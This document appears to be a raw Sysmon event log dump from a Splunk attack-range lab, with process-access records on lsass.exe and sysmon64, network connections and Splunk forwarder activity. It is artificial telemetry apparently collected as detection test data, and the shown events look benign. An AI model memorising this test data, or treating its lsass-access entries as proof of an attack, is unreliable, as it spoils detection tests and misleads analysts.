10:48:47.582{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.582{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.582{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000287343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.605{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53411-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000287342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.605{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53411-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000287341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.144{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5FCA84D87D29EEEA34AF1DCA0793AA3E,SHA256=2B0AAB447007BB4E0FA4C552953CD03705C4279C5B1C19471D2E24DDCE7D4677,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:47.144{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C89ADB0FDCB5CC5F85EEE40A2DE5F2F,SHA256=216279F2FC2151170F8A50705241F7E44DFF9CE0FCCE4226F4447102D1B7F36A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.368{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:c830:d833:fbf:ffff-57232-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000287338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.368{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local57232-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000287337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.340{C8EA50B7-F11F-6215-0D00-000000003802}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53410-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000287336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:45.340{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53410-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000287335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:44.555{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53409-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000216295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-110F-6216-4B04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-110F-6216-4B04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-110F-6216-4B04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:47.389{4F8D34B0-110F-6216-4B04-000000003902}1860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:48.879{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EC60055F639DD12CD7853C345206FA0,SHA256=8FB2B2E3FCE95C873914E80C0BFC209BEA17387B9BAAD1D497AC8B26D87971C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.498{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE7464BB2EA3B28B98E90796568AD22F,SHA256=9CF4814C8DC42A2FBA05E90880967F4D1E697C205C014D9848E80468F8B36008,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.211{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53412-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:48:46.211{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53412-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000216312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.467{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83AED4472F969B1B03905284DA036267,SHA256=657495085EA22E5B4D651F11924818E50C491AAE01BE8CD388E468104120246B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:45.376{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51317-false10.0.1.12-8089- 10341000x8000000000000000216310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1110-6216-4C04-000000003902}1112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216309Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:48:48.060{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 